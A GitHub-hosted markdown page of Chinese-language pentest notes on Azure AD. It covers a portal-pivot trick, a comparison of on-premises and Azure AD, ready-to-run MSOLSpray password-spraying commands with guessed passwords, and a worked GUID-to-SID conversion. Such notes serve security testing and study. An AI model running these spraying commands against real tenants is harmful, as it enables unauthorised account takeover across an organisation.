Skip to content

Latest commit

 

History

History
26 lines (24 loc) · 1.32 KB

AzureAD.md

File metadata and controls

26 lines (24 loc) · 1.32 KB
对于 Microsoft,如果您将任何云服务(Office 365、Exchange Online 等)与 Active Directory(本地或在 Azure 中)一起使用,那么攻击者只需一个凭证就可以通过 Azure AD泄露您的整个 Active Directory 结构
验证您的网络邮件门户(即https://webmail.domain.com/)
将浏览器 URL 更改为:https ://azure.microsoft.com/
从活动会话中选择帐户
选择 Azure Active Directory
Active Directory Azure AD
LDAP REST API'S
NTLM/Kerberos OAuth/SAML/OpenID
Structured directory (OU tree) Flat structure
GPO No GPO's
Super fine-tuned access controls Predefined roles
Domain/forest Tenant
Trusts Guests
密码喷射
>git clone https://github.com/dafthack/MSOLSpray
>Import-Module .\MSOLSpray.ps1
>Invoke-MSOLSpray -UserList .\userlist.txt -Password Winter2020
>Invoke-MSOLSpray -UserList .\users.txt -Password d0ntSprayme!
将 GUID 转换为 SID
通过连接"S-1–12–1-"到 AAD Id 的每个部分的十进制表示,将用户的 AAD id 转换为 SID。

GUID: [base16(a1)]-[base16(a2)]-[ base16(a3)]-[base16(a4)]
SID: S-1–12–1-[base10(a1)]-[ base10(a2)]-[ base10(a3)]-[ base10(a4)]
例如,表示6aa89ecb-1f8f-4d92–810d-b0dce30b6c82是S-1–12–1–1789435595–1301421967–3702525313–2188119011